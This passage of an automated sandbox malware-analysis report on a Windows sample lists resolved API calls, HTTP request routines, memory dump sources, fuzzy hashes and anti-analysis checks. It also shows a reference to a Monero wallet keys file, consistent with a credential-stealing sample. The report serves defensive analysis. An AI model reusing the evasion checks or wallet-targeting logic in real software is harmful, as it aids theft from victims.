                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: a4659f8cc279dfe576117fc08005c36e9efa1fdea9c4a9703c628bb7cc188f0e
                                • Instruction ID: 18b7fdbf3f84bde9a791c870757a9906fbafadcc40661f20ba772241088a4668
                                • Opcode Fuzzy Hash: a4659f8cc279dfe576117fc08005c36e9efa1fdea9c4a9703c628bb7cc188f0e
                                • Instruction Fuzzy Hash: 5CF031F2944208ABC700DFD5DD45FAABBB8F704761F100159EA15E3680C7745505CBE1
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 5760a82d0353ef4dfb14b6dcf94d1a90e623fc905af204f753b94296d4a0e7da
                                • Instruction ID: 8880b55551bbd97dd5c49863cc53bcfc2e3852857854d0aa7bc7184f0bf82863
                                • Opcode Fuzzy Hash: 5760a82d0353ef4dfb14b6dcf94d1a90e623fc905af204f753b94296d4a0e7da
                                • Instruction Fuzzy Hash: C8D05EB490030CDBCB00EFE0D849AEDBB78FB08311F001554D909B2340EA306482CBA6

                                 Control-flow Graph (rendered graph not reproduced; legend: Executed, Not Executed)
                                APIs
                                • GetProcAddress.KERNEL32(76F70000,007A63E0), ref: 008C9C2D
                                • GetProcAddress.KERNEL32(76F70000,007A65A0), ref: 008C9C45
                                • GetProcAddress.KERNEL32(76F70000,007B8F70), ref: 008C9C5E
                                • GetProcAddress.KERNEL32(76F70000,007B8EE0), ref: 008C9C76
                                • GetProcAddress.KERNEL32(76F70000,007BC798), ref: 008C9C8E
                                • GetProcAddress.KERNEL32(76F70000,007BC780), ref: 008C9CA7
                                • GetProcAddress.KERNEL32(76F70000,007AB0F8), ref: 008C9CBF
                                • GetProcAddress.KERNEL32(76F70000,007BC7E0), ref: 008C9CD7
                                • GetProcAddress.KERNEL32(76F70000,007BC7B0), ref: 008C9CF0
                                • GetProcAddress.KERNEL32(76F70000,007BC660), ref: 008C9D08
                                • GetProcAddress.KERNEL32(76F70000,007BC768), ref: 008C9D20
                                • GetProcAddress.KERNEL32(76F70000,007A6320), ref: 008C9D39
                                • GetProcAddress.KERNEL32(76F70000,007A6240), ref: 008C9D51
                                • GetProcAddress.KERNEL32(76F70000,007A6520), ref: 008C9D69
                                • GetProcAddress.KERNEL32(76F70000,007A6400), ref: 008C9D82
                                • GetProcAddress.KERNEL32(76F70000,007BC750), ref: 008C9D9A
                                • GetProcAddress.KERNEL32(76F70000,007BC678), ref: 008C9DB2
                                • GetProcAddress.KERNEL32(76F70000,007AB238), ref: 008C9DCB
                                • GetProcAddress.KERNEL32(76F70000,007A6420), ref: 008C9DE3
                                • GetProcAddress.KERNEL32(76F70000,007BC7C8), ref: 008C9DFB
                                • GetProcAddress.KERNEL32(76F70000,007BC630), ref: 008C9E14
                                • GetProcAddress.KERNEL32(76F70000,007BC6C0), ref: 008C9E2C
                                • GetProcAddress.KERNEL32(76F70000,007BC648), ref: 008C9E44
                                • GetProcAddress.KERNEL32(76F70000,007A6460), ref: 008C9E5D
                                • GetProcAddress.KERNEL32(76F70000,007BC690), ref: 008C9E75
                                • GetProcAddress.KERNEL32(76F70000,007BC6A8), ref: 008C9E8D
                                • GetProcAddress.KERNEL32(76F70000,007BC6D8), ref: 008C9EA6
                                • GetProcAddress.KERNEL32(76F70000,007BC708), ref: 008C9EBE
                                • GetProcAddress.KERNEL32(76F70000,007BC6F0), ref: 008C9ED6
                                • GetProcAddress.KERNEL32(76F70000,007BC720), ref: 008C9EEF
                                • GetProcAddress.KERNEL32(76F70000,007BC738), ref: 008C9F07
                                • GetProcAddress.KERNEL32(76F70000,007BC2B8), ref: 008C9F1F
                                • GetProcAddress.KERNEL32(76F70000,007BC120), ref: 008C9F38
                                • GetProcAddress.KERNEL32(76F70000,007BCEC8), ref: 008C9F50
                                • GetProcAddress.KERNEL32(76F70000,007BC030), ref: 008C9F68
                                • GetProcAddress.KERNEL32(76F70000,007BC258), ref: 008C9F81
                                • GetProcAddress.KERNEL32(76F70000,007A6480), ref: 008C9F99
                                • GetProcAddress.KERNEL32(76F70000,007BC1F8), ref: 008C9FB1
                                • GetProcAddress.KERNEL32(76F70000,007A64A0), ref: 008C9FCA
                                • GetProcAddress.KERNEL32(76F70000,007BC210), ref: 008C9FE2
                                • GetProcAddress.KERNEL32(76F70000,007BC0C0), ref: 008C9FFA
                                • GetProcAddress.KERNEL32(76F70000,007A64C0), ref: 008CA013
                                • GetProcAddress.KERNEL32(76F70000,007A6580), ref: 008CA02B
                                • LoadLibraryA.KERNEL32(007BC270,?,008C5CA3,008D0AEB,?,?,?,?,?,?,?,?,?,?,008D0AEA,008D0AE3), ref: 008CA03D
                                • LoadLibraryA.KERNEL32(007BC228,?,008C5CA3,008D0AEB,?,?,?,?,?,?,?,?,?,?,008D0AEA,008D0AE3), ref: 008CA04E
                                • LoadLibraryA.KERNEL32(007BC240,?,008C5CA3,008D0AEB,?,?,?,?,?,?,?,?,?,?,008D0AEA,008D0AE3), ref: 008CA060
                                • LoadLibraryA.KERNEL32(007BC288,?,008C5CA3,008D0AEB,?,?,?,?,?,?,?,?,?,?,008D0AEA,008D0AE3), ref: 008CA072
                                • LoadLibraryA.KERNEL32(007BC0D8,?,008C5CA3,008D0AEB,?,?,?,?,?,?,?,?,?,?,008D0AEA,008D0AE3), ref: 008CA083
                                • LoadLibraryA.KERNEL32(007BC2D0,?,008C5CA3,008D0AEB,?,?,?,?,?,?,?,?,?,?,008D0AEA,008D0AE3), ref: 008CA095
                                • LoadLibraryA.KERNEL32(007BC2E8,?,008C5CA3,008D0AEB,?,?,?,?,?,?,?,?,?,?,008D0AEA,008D0AE3), ref: 008CA0A7
                                • LoadLibraryA.KERNEL32(007BC300,?,008C5CA3,008D0AEB,?,?,?,?,?,?,?,?,?,?,008D0AEA,008D0AE3), ref: 008CA0B8
                                • GetProcAddress.KERNEL32(75840000,007A6700), ref: 008CA0DA
                                • GetProcAddress.KERNEL32(75840000,007BC090), ref: 008CA0F2
                                • GetProcAddress.KERNEL32(75840000,007B8A98), ref: 008CA10A
                                • GetProcAddress.KERNEL32(75840000,007BC2A0), ref: 008CA123
                                • GetProcAddress.KERNEL32(75840000,007A67E0), ref: 008CA13B
                                • GetProcAddress.KERNEL32(73B90000,007AAE00), ref: 008CA160
                                • GetProcAddress.KERNEL32(73B90000,007A6620), ref: 008CA179
                                • GetProcAddress.KERNEL32(73B90000,007AAF68), ref: 008CA191
                                • GetProcAddress.KERNEL32(73B90000,007BC318), ref: 008CA1A9
                                • GetProcAddress.KERNEL32(73B90000,007BC060), ref: 008CA1C2
                                • GetProcAddress.KERNEL32(73B90000,007A6640), ref: 008CA1DA
                                • GetProcAddress.KERNEL32(73B90000,007A6740), ref: 008CA1F2
                                • GetProcAddress.KERNEL32(73B90000,007BC078), ref: 008CA20B
                                • GetProcAddress.KERNEL32(760B0000,007A6880), ref: 008CA22C
                                • GetProcAddress.KERNEL32(760B0000,007A67C0), ref: 008CA244
                                • GetProcAddress.KERNEL32(760B0000,007BC0A8), ref: 008CA25D
                                • GetProcAddress.KERNEL32(760B0000,007BC048), ref: 008CA275
                                • GetProcAddress.KERNEL32(760B0000,007A68E0), ref: 008CA28D
                                • GetProcAddress.KERNEL32(75D30000,007AB148), ref: 008CA2B3
                                • GetProcAddress.KERNEL32(75D30000,007AAF90), ref: 008CA2CB
                                • GetProcAddress.KERNEL32(75D30000,007BC198), ref: 008CA2E3
                                • GetProcAddress.KERNEL32(75D30000,007A68A0), ref: 008CA2FC
                                • GetProcAddress.KERNEL32(75D30000,007A6840), ref: 008CA314
                                • GetProcAddress.KERNEL32(75D30000,007AAEC8), ref: 008CA32C
                                • GetProcAddress.KERNEL32(753A0000,007BC0F0), ref: 008CA352
                                • GetProcAddress.KERNEL32(753A0000,007A6720), ref: 008CA36A
                                • GetProcAddress.KERNEL32(753A0000,007B8B58), ref: 008CA382
                                • GetProcAddress.KERNEL32(753A0000,007BC108), ref: 008CA39B
                                • GetProcAddress.KERNEL32(753A0000,007BC180), ref: 008CA3B3
                                • GetProcAddress.KERNEL32(753A0000,007A65E0), ref: 008CA3CB
                                • GetProcAddress.KERNEL32(753A0000,007A65C0), ref: 008CA3E4
                                • GetProcAddress.KERNEL32(753A0000,007BC138), ref: 008CA3FC
                                • GetProcAddress.KERNEL32(753A0000,007BC150), ref: 008CA414
                                • GetProcAddress.KERNEL32(76DA0000,007A66A0), ref: 008CA436
                                • GetProcAddress.KERNEL32(76DA0000,007BC168), ref: 008CA44E
                                • GetProcAddress.KERNEL32(76DA0000,007BC1B0), ref: 008CA466
                                • GetProcAddress.KERNEL32(76DA0000,007BC1C8), ref: 008CA47F
                                • GetProcAddress.KERNEL32(76DA0000,007BC1E0), ref: 008CA497
                                • GetProcAddress.KERNEL32(77300000,007A6800), ref: 008CA4B8
                                • GetProcAddress.KERNEL32(77300000,007A6820), ref: 008CA4D1
                                • GetProcAddress.KERNEL32(767E0000,007A6600), ref: 008CA4F2
                                • GetProcAddress.KERNEL32(767E0000,007BC450), ref: 008CA50A
                                • GetProcAddress.KERNEL32(6F8E0000,007A6660), ref: 008CA530
                                • GetProcAddress.KERNEL32(6F8E0000,007A67A0), ref: 008CA548
                                • GetProcAddress.KERNEL32(6F8E0000,007A6760), ref: 008CA560
                                • GetProcAddress.KERNEL32(6F8E0000,007BC600), ref: 008CA579
                                • GetProcAddress.KERNEL32(6F8E0000,007A6680), ref: 008CA591
                                • GetProcAddress.KERNEL32(6F8E0000,007A6860), ref: 008CA5A9
                                • GetProcAddress.KERNEL32(6F8E0000,007A68C0), ref: 008CA5C2
                                • GetProcAddress.KERNEL32(6F8E0000,007A6900), ref: 008CA5DA
                                • GetProcAddress.KERNEL32(6F8E0000,InternetSetOptionA), ref: 008CA5F1
                                • GetProcAddress.KERNEL32(6F8E0000,HttpQueryInfoA), ref: 008CA607
                                • GetProcAddress.KERNEL32(75760000,007BC3D8), ref: 008CA629
                                • GetProcAddress.KERNEL32(75760000,007B89B8), ref: 008CA641
                                • GetProcAddress.KERNEL32(75760000,007BC480), ref: 008CA659
                                • GetProcAddress.KERNEL32(75760000,007BC5A0), ref: 008CA672
                                • GetProcAddress.KERNEL32(762C0000,007A66C0), ref: 008CA693
                                • GetProcAddress.KERNEL32(6D6E0000,007BC378), ref: 008CA6B4
                                • GetProcAddress.KERNEL32(6D6E0000,007A66E0), ref: 008CA6CD
                                • GetProcAddress.KERNEL32(6D6E0000,007BC618), ref: 008CA6E5
                                • GetProcAddress.KERNEL32(6D6E0000,007BC4E0), ref: 008CA6FD
                                Strings
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: cz$ dz$ ez$ fz$ gz$ hz$@bz$@fz$@gz$@hz$HttpQueryInfoA$InternetSetOptionA$`dz$`fz$`gz$`hz$cz$ez$fz$gz$hz
                                • API String ID: 2238633743-1470533211
                                • Opcode ID: 97eddf3d2d878d223af2d9d0bf25d9ddc1dc7b356641e2682c94f49667b8dd5f
                                • Instruction ID: bf764a63f05376884bf18ed6a04f347326cd1a43f9d7d062864f8df4465fbedc
                                • Opcode Fuzzy Hash: 97eddf3d2d878d223af2d9d0bf25d9ddc1dc7b356641e2682c94f49667b8dd5f
                                • Instruction Fuzzy Hash: B76217F6600201AFC344EBE9ED88DF67BF9F7AC341714851AA60DC3264D679A843DB52

                                 Control-flow Graph (rendered graph not reproduced; legend: Executed, Not Executed)
                                APIs
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008B4839
                                  • Part of subcall function 008B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008B4849
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • InternetOpenA.WININET(008D0DFE,00000001,00000000,00000000,00000000), ref: 008B62E1
                                • StrCmpCA.SHLWAPI(?,007BE270), ref: 008B6303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008B6335
                                • HttpOpenRequestA.WININET(00000000,GET,?,007BD9C8,00000000,00000000,00400100,00000000), ref: 008B6385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008B63BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008B63D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 008B63FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 008B646D
                                • InternetCloseHandle.WININET(00000000), ref: 008B64EF
                                • InternetCloseHandle.WININET(00000000), ref: 008B64F9
                                • InternetCloseHandle.WININET(00000000), ref: 008B6503
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET$p{
                                • API String ID: 3749127164-3508196275
                                • Opcode ID: 1b36a623f0208cc0e16b73c1e96062d2010e19a5c899bd0a27cba3fbea9a6db9
                                • Instruction ID: 41e05542c1099938d1d0bc5d37b53633a1015b165f457ee453f1eedb2a64f0fe
                                • Opcode Fuzzy Hash: 1b36a623f0208cc0e16b73c1e96062d2010e19a5c899bd0a27cba3fbea9a6db9
                                • Instruction Fuzzy Hash: 38710F71A00218ABDB24DFE4DC59FEE7774FB44704F108159F509AB290EBB4AA85CF52

                                 Control-flow Graph (rendered graph not reproduced; legend: Executed, Not Executed)
                                APIs
                                  • Part of subcall function 008CA820: lstrlen.KERNEL32(008B4F05,?,?,008B4F05,008D0DDE), ref: 008CA82B
                                  • Part of subcall function 008CA820: lstrcpy.KERNEL32(008D0DDE,00000000), ref: 008CA885
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008C5644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008C56A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008C5857
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008C51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008C5228
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008C52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008C5318
                                  • Part of subcall function 008C52C0: lstrlen.KERNEL32(00000000), ref: 008C532F
                                  • Part of subcall function 008C52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 008C5364
                                  • Part of subcall function 008C52C0: lstrlen.KERNEL32(00000000), ref: 008C5383
                                  • Part of subcall function 008C52C0: lstrlen.KERNEL32(00000000), ref: 008C53AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008C578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008C5940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008C5A0C
                                • Sleep.KERNEL32(0000EA60), ref: 008C5A1B
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$bz
                                • API String ID: 507064821-2187572780
                                • Opcode ID: 3902c31b7918aae3db904cb032a9d2db7c86369f65f5394981e60ba34187b100
                                • Instruction ID: a20320b65cebf7b4b97364a64cc38eb8ccb59bb28320f06ee1476d7f0d2dd83a
                                • Opcode Fuzzy Hash: 3902c31b7918aae3db904cb032a9d2db7c86369f65f5394981e60ba34187b100
                                • Instruction Fuzzy Hash: B6E1EC719101089BCB18FBA8EC96FED7378FB54344F50852CA506D6191EF34AA4ACBA3

                                 Control-flow Graph (rendered graph not reproduced; legend: Executed, Not Executed)
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 008C17C5
                                • ExitProcess.KERNEL32 ref: 008C17D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458

                                Control-flow Graph

                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008C7542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008C757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C7603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C760A
                                • wsprintfA.USER32 ref: 008C7640
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                • String ID: :$C$\
                                • API String ID: 1544550907-3809124531

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B0708), ref: 008C98A1
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B0720), ref: 008C98BA
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B0540), ref: 008C98D2
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B0570), ref: 008C98EA
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B0738), ref: 008C9903
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B8B18), ref: 008C991B
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007A6440), ref: 008C9933
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007A6360), ref: 008C994C
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B0768), ref: 008C9964
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B0780), ref: 008C997C
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B07C8), ref: 008C9995
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B05B8), ref: 008C99AD
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007A6200), ref: 008C99C5
                                  • Part of subcall function 008C9860: GetProcAddress.KERNEL32(76F70000,007B07E0), ref: 008C99DE
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008B11D0: ExitProcess.KERNEL32 ref: 008B1211
                                  • Part of subcall function 008B1160: GetSystemInfo.KERNEL32(?), ref: 008B116A
                                  • Part of subcall function 008B1160: ExitProcess.KERNEL32 ref: 008B117E
                                  • Part of subcall function 008B1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008B112B
                                  • Part of subcall function 008B1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 008B1132
                                  • Part of subcall function 008B1110: ExitProcess.KERNEL32 ref: 008B1143
                                  • Part of subcall function 008B1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008B123E
                                  • Part of subcall function 008B1220: __aulldiv.LIBCMT ref: 008B1258
                                  • Part of subcall function 008B1220: __aulldiv.LIBCMT ref: 008B1266
                                  • Part of subcall function 008B1220: ExitProcess.KERNEL32 ref: 008B1294
                                  • Part of subcall function 008C6770: GetUserDefaultLangID.KERNEL32 ref: 008C6774
                                  • Part of subcall function 008B1190: ExitProcess.KERNEL32 ref: 008B11C6
                                  • Part of subcall function 008C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008B11B7), ref: 008C7880
                                  • Part of subcall function 008C7850: RtlAllocateHeap.NTDLL(00000000), ref: 008C7887
                                  • Part of subcall function 008C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008C789F
                                  • Part of subcall function 008C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C7910
                                  • Part of subcall function 008C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008C7917
                                  • Part of subcall function 008C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008C792F
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,007B8A28,?,008D110C,?,00000000,?,008D1110,?,00000000,008D0AEF), ref: 008C6ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008C6AE8
                                • CloseHandle.KERNEL32(00000000), ref: 008C6AF9
                                • Sleep.KERNEL32(00001770), ref: 008C6B04
                                • CloseHandle.KERNEL32(?,00000000,?,007B8A28,?,008D110C,?,00000000,?,008D1110,?,00000000,008D0AEF), ref: 008C6B1A
                                • ExitProcess.KERNEL32 ref: 008C6B22
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0

                                Control-flow Graph

                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 008B123E
                                • __aulldiv.LIBCMT ref: 008B1258
                                • __aulldiv.LIBCMT ref: 008B1266
                                • ExitProcess.KERNEL32 ref: 008B1294
                                Strings
                                Yara matches
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989

                                Control-flow Graph

                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,007B8A28,?,008D110C,?,00000000,?,008D1110,?,00000000,008D0AEF), ref: 008C6ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 008C6AE8
                                • CloseHandle.KERNEL32(00000000), ref: 008C6AF9
                                • Sleep.KERNEL32(00001770), ref: 008C6B04
                                • CloseHandle.KERNEL32(?,00000000,?,007B8A28,?,008D110C,?,00000000,?,008D1110,?,00000000,008D0AEF), ref: 008C6B1A
                                • ExitProcess.KERNEL32 ref: 008C6B22
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008B4839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 008B4849
                                Strings
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B6280: InternetOpenA.WININET(008D0DFE,00000001,00000000,00000000,00000000), ref: 008B62E1
                                  • Part of subcall function 008B6280: StrCmpCA.SHLWAPI(?,007BE270), ref: 008B6303
                                  • Part of subcall function 008B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008B6335
                                  • Part of subcall function 008B6280: HttpOpenRequestA.WININET(00000000,GET,?,007BD9C8,00000000,00000000,00400100,00000000), ref: 008B6385
                                  • Part of subcall function 008B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008B63BF
                                  • Part of subcall function 008B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008B63D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008C5228
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: 83ed5332cd8b7d6a2ef2580786273cf6d015ecdf7b116ea2323fff81cfd05ed0
                                • Instruction ID: ef5d49e5a2a07779406ab927212faf99e1595ec8821318920c9b008ef976491b
                                • Opcode Fuzzy Hash: 83ed5332cd8b7d6a2ef2580786273cf6d015ecdf7b116ea2323fff81cfd05ed0
                                • Instruction Fuzzy Hash: 4411CB7091054CA7DB18FB68D996FED7378FF50344F808168A81A9A592EF34AB05C692
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 008B112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 008B1132
                                • ExitProcess.KERNEL32 ref: 008B1143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
